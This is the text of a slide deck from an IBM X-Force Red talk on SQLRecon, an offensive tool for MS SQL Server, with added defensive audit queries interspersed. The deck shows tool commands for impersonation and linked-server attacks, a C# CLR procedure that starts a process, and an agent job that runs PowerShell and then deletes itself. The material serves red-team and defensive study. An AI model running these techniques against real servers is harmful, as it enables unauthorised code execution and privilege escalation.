Abusing MS SQL Using SQLRecon
Sanjiv Kawa
Adversary Simulation, IBM X-Force Red
May 6, 2022
whoami?
IBM Security / © 2022 IBM Corporation 2
Role
» Adversary Simulation, IBM X-Force Red
Hobbies
Agenda
Introducing SQLRecon 3 min
Demo 1: Basic Modules 2 min
Demo 2: Impersonation Attacks 4 min
Demo 3: Attacking Linked SQL Servers 4 min
Development Roadmap 1 min
Conclusion & Questions 1 min
Introducing SQLRecon
What’s currently available?
A good number of offensive MS SQL tools already exist
– metasploit
– crackmapexec
– PowerUpSQL
How did this research come about?
Like most tooling … to solve a problem encountered on an engagement
Also to address the MS SQL C# post-exploitation tooling gap
– Modernize the approach
– Works with a diverse set of C2 frameworks
– execute-assembly and InlineExecute-Assembly compatible
Why bother attacking MS SQL?
Often overlooked
Often misconfigured
BUILTIN\Users can connect to MS SQL servers by default, and:
– Execute basic SQL commands
– Determine rights via user mapping/roles -> impersonation attacks
– UNC path injection. Creds or SMB relay -> code execution
– Piggyback off rights to compromise linked servers
Demo Time
Demo 1: Basic Modules
Usage
1. Set an authentication context
2. Supply a module
SQLRecon.exe -a Windows -s SQL01 -d msdb -m whoami
SQLRecon.exe -a Local -s SQL01 -d msdb -u sa -p Password123 -m whoami
SQLRecon.exe -a Azure -r domain.com -d msdb -u jsmith -p Password123 -m whoami
Demo Context
Basic Modules
query
whoami
databases
tables
search
smb
Plenty more … (SQLRecon.exe -h)
Privilege Check
whoami
whoami ctd.
databases
tables
search
query
smb
Demo 2: Impersonation Attacks
Demo Configuration - Impersonation
IMPERSONATE is a special permission
It enables a user or group to:
- Operate with the permissions of another user;
- As well as with their own permissions.
Impersonation
SQLRecon.exe -a Windows -s SQL02 -d master -m impersonate
SQLRecon.exe -a Windows -s SQL02 -d master -m iwhoami -i sa
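As an added example (not from the deck or the SQLRecon project), the audit queries behind what the impersonate module enumerates: which principals hold IMPERSONATE on which others, and whether a target is a sysadmin. It assumes SQL Server 2012 or later and a sysadmin caller so that every grant is visible; the login names in the remediation comment are placeholders.

```sql
-- Added audit query (not from the deck or SQLRecon): who may impersonate whom.
-- Run as a sysadmin: sys.server_permissions only returns rows the caller is
-- allowed to see, so a low-privileged caller gets a partial picture.

-- 1. Server level: login -> login grants. This is the exposure behind the
--    'impersonate' and 'iwhoami -i sa' modules on the slides.
SELECT
    grantee.name                               AS grantee_login,
    grantee.type_desc                          AS grantee_type,
    target.name                                AS can_impersonate_login,
    IS_SRVROLEMEMBER('sysadmin', target.name)  AS target_is_sysadmin,
    perm.state_desc                            AS grant_state
FROM sys.server_permissions  AS perm
JOIN sys.server_principals   AS grantee ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals   AS target  ON target.principal_id  = perm.major_id
WHERE perm.class_desc      = 'SERVER_PRINCIPAL'
  AND perm.permission_name = 'IMPERSONATE'
ORDER BY target_is_sysadmin DESC, grantee.name;

-- 2. Database level (current database): user -> user grants. A grant on dbo in
--    a database that has TRUSTWORTHY ON and a sysadmin owner is the one to
--    treat as server-level exposure.
SELECT
    DB_NAME()                                  AS database_name,
    (SELECT is_trustworthy_on
     FROM sys.databases WHERE database_id = DB_ID()) AS db_trustworthy,
    grantee.name                               AS grantee_user,
    target.name                                AS can_impersonate_user,
    perm.state_desc                            AS grant_state
FROM sys.database_permissions AS perm
JOIN sys.database_principals  AS grantee ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.database_principals  AS target  ON target.principal_id  = perm.major_id
WHERE perm.class_desc      = 'DATABASE_PRINCIPAL'
  AND perm.permission_name = 'IMPERSONATE';

-- Remediation for an unexpected server-level grant (placeholder names):
-- REVOKE IMPERSONATE ON LOGIN::[sa] FROM [DOMAIN\someuser];
```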
impersonate
Custom CLR Assemblies
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void BaconTime()
    {
    }
}
https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
Custom CLR Assemblies
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;
public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void BaconTime()
    {
        // Starts a process from inside the SQL Server service; the assembly
        // has to be loaded with PERMISSION_SET = UNSAFE for this to run
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\notepad.exe";
        proc.Start();
    }
}
https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
ienableclr
Upload DLL to disk
iclr
idisableclr
Agent Jobs
Caveat:
- SQL Agent must be running
- Does not work with SQL Server Express edition
- Works with: Developer, Standard and Enterprise editions
iagentstatus
Agent Jobs
-- The job procedures live in msdb
USE msdb;
EXEC dbo.sp_add_job @job_name = 'test_ps_job1';
EXEC dbo.sp_add_jobstep @job_name = 'test_ps_job1',
    @step_name = 'test_ps_name1',
    @subsystem = 'PowerShell',
    @command = 'powershell.exe start-process notepad',
    @retry_attempts = 1,
    @retry_interval = 5;
EXEC dbo.sp_add_jobserver @job_name = 'test_ps_job1';  -- targets the local server
EXEC dbo.sp_start_job 'test_ps_job1';
WAITFOR DELAY '00:00:05';
EXEC dbo.sp_delete_job @job_name = 'test_ps_job1';     -- also removes the job's history
iagentcmd
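Added example (not from the deck or the SQLRecon project): a defender's one-pass audit of the settings and objects behind the execution techniques the deck covers, custom CLR assemblies and agent jobs above plus xp_cmdshell and OLE Automation. It assumes SQL Server 2017 or later (for sys.trusted_assemblies and 'clr strict security') and a sysadmin caller; the assembly part runs per database.

```sql
-- Added audit script (not from the deck or SQLRecon). Assumes SQL Server 2017+
-- and a sysadmin caller; run section 2 in each user database.

-- 1. Server options each technique depends on. 'xp_cmdshell', 'Ole Automation
--    Procedures' and 'clr enabled' should be 0 unless a documented workload
--    needs them; 'clr strict security' should be 1.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'clr enabled', 'clr strict security')
ORDER BY name;

-- 2. User-loaded CLR assemblies in the current database. Anything not SAFE, or
--    not on the trusted list, deserves a look: the BaconTime procedure on the
--    slides needs UNSAFE to call Process.Start. sys.trusted_assemblies stores
--    the SHA2_512 of the assembly bytes, so the join tells you whether an
--    assembly was explicitly allow-listed.
SELECT
    DB_NAME()                                   AS database_name,
    a.name                                      AS assembly_name,
    a.permission_set_desc,
    a.create_date,
    USER_NAME(a.principal_id)                   AS owner_user,
    CASE WHEN ta.hash IS NULL THEN 0 ELSE 1 END AS on_trusted_list,
    DATALENGTH(af.content)                      AS size_bytes
FROM sys.assemblies              AS a
JOIN sys.assembly_files          AS af ON af.assembly_id = a.assembly_id AND af.file_id = 1
LEFT JOIN sys.trusted_assemblies AS ta ON ta.hash = HASHBYTES('SHA2_512', af.content)
WHERE a.is_user_defined = 1
ORDER BY a.create_date DESC;

-- 3. Agent job steps that run outside T-SQL, with owner and command text.
SELECT
    j.name                    AS job_name,
    SUSER_SNAME(j.owner_sid)  AS owner_login,
    j.enabled,
    j.date_created,
    s.step_id,
    s.subsystem,
    s.command
FROM msdb.dbo.sysjobs     AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
ORDER BY j.date_created DESC;

-- The job on the slides is deleted five seconds after it starts, and
-- sp_delete_job removes the job's history by default, so a point-in-time
-- query of sysjobs misses it. Short-lived jobs are better caught with a SQL
-- Server Audit on msdb (SCHEMA_OBJECT_ACCESS_GROUP records the EXECUTE of
-- sp_add_jobstep) and with process-creation logging on the host (Windows
-- event 4688 or Sysmon event 1), where the parent chain leads to SQLAGENT.EXE.
```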
Demo 3: Attacking Linked SQL Servers
Demo Configuration - Links
SQL02 might be segmented from the network you’re on
A link could exist from SQL01 -> SQL02
Leverage SQL01 to issue queries on SQL02
Linked SQL Servers
SQLRecon.exe -a Windows -s SQL01 -d master -m links
SQLRecon.exe -a Windows -s SQL01 -d master -m lwhoami -l SQL02
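Added example (not from the deck or the SQLRecon project): the audit queries behind what the links and lwhoami modules reveal, run on SQL01 as a sysadmin. The SQL01 -> SQL02 link is the one from the demo; the login in the remediation comment is a placeholder.

```sql
-- Added audit query (not from the deck or SQLRecon): which linked servers exist
-- and what identity a caller gets on the other side. Run as sysadmin on SQL01.
SELECT
    s.name                       AS linked_server,
    s.product,
    s.provider,
    s.data_source,
    s.is_rpc_out_enabled,        -- 1 lets callers run procedures remotely (EXECUTE ... AT)
    s.is_data_access_enabled,    -- 1 lets callers query via OPENQUERY / four-part names
    CASE WHEN ll.local_principal_id = 0 THEN '<any local login>'
         ELSE p.name END         AS local_login,
    ll.uses_self_credential,     -- 1 = the caller's own credentials pass through
    ll.remote_name               AS mapped_remote_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id   = s.server_id
LEFT JOIN sys.server_principals AS p  ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Rows with local_login = '<any local login>', uses_self_credential = 0 and a
-- mapped_remote_login set are the risky ones: every login on SQL01, including
-- BUILTIN\Users members, reaches SQL02 as that fixed remote account. Confirm
-- what the account can do remotely (this is what 'lwhoami -l SQL02' reports):
SELECT * FROM OPENQUERY([SQL02],
    'SELECT SYSTEM_USER AS remote_login,
            IS_SRVROLEMEMBER(''sysadmin'') AS remote_is_sysadmin');

-- Remediation: drop the catch-all mapping and map only the logins that need
-- the link, with their own (pass-through) credentials. Placeholder login name.
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'SQL02', @locallogin = NULL;
-- EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'SQL02', @useself = 'TRUE',
--                            @locallogin = N'DOMAIN\app_service';
```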
links
SQLRecon.exe -a Windows -s SQL01 -d master -m links
lwhoami
ldatabases
ltables
lenableole
lolecmd
ldisableole
lsmb
Development Roadmap
To Do's
- Expand Command Execution Techniques

Execution Technique   | Standard | Impersonation | Linked
xp_cmdshell           | ✅       | ✅            | ✅
OLE Automation        | ✅       | ✅            | ✅
Custom CLR Assemblies | ✅       | ✅            | ❌
Agent Jobs            | ✅       | ✅            | ❌
Conclusion
Conclusion & Questions
Address the MS SQL C# post-exploitation tooling gap
Helps operators using C2 frameworks perform MS SQL attacks
@sanjivkawa
github.com/skahwah/SQLRecon
Abusing MS SQL Using SQLRecon

More Related Content

What's hot

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution64 Methods for Mimikatz Execution
64 Methods for Mimikatz ExecutionHadess
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Docker Container Security
Docker Container SecurityDocker Container Security
Docker Container SecuritySuraj Khetani
 
DevOps - Interview Question.pdf
DevOps - Interview Question.pdfDevOps - Interview Question.pdf
DevOps - Interview Question.pdfMinhTrnNht7
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practicesSharon Vendrov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsWill Schroeder
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Aqua Security
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesSetting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesElizabeth Yu, MBA
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultChickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultJeff Horwitz
 

What's hot (20)

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
Windows Attacks AT is the new black
Windows Attacks   AT is the new blackWindows Attacks   AT is the new black
Windows Attacks AT is the new black
 
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
Docker Container Security
Docker Container SecurityDocker Container Security
Docker Container Security
 
DevOps - Interview Question.pdf
DevOps - Interview Question.pdfDevOps - Interview Question.pdf
DevOps - Interview Question.pdf
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Sql injection
Sql injectionSql injection
Sql injection
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesSetting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in Kubernetes
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultChickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
 

Similar to Abusing MS SQL Using SQLRecon

Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Sharon James
 
Automated CI with AEM Cloud service
Automated CI with AEM Cloud serviceAutomated CI with AEM Cloud service
Automated CI with AEM Cloud serviceJakub Wadolowski
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
 
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerBeyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerNetSPI
 
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013MattKilner
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013MattKilner
 
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, FasterSaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, FasterThomas Jackson
 
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...William Holmes
 
resilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptxresilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptxmodathernady
 
Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726Rohit Kelapure
 
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)philipdurbin
 
Tips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS ApplicationsTips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS ApplicationsStrongback Consulting
 
Modularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java AppModularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java AppDinakar Guniguntala
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...Carl Tyler
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksIBM Security
 
The enterprise manager command line interface2
The enterprise manager command line interface2The enterprise manager command line interface2
The enterprise manager command line interface2Kellyn Pot'Vin-Gorman
 

Similar to Abusing MS SQL Using SQLRecon (20)

Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
 
Automated CI with AEM Cloud service
Automated CI with AEM Cloud serviceAutomated CI with AEM Cloud service
Automated CI with AEM Cloud service
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerBeyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
 
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013
 
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, FasterSaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
 
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
 
resilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptxresilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptx
 
Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726
 
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)
 
Tips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS ApplicationsTips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS Applications
 
Modularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java AppModularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java App
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
2) security
2) security2) security
2) security
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
 
TSRT Crashes
TSRT CrashesTSRT Crashes
TSRT Crashes
 
The enterprise manager command line interface2
The enterprise manager command line interface2The enterprise manager command line interface2
The enterprise manager command line interface2
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 

Recently uploaded (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
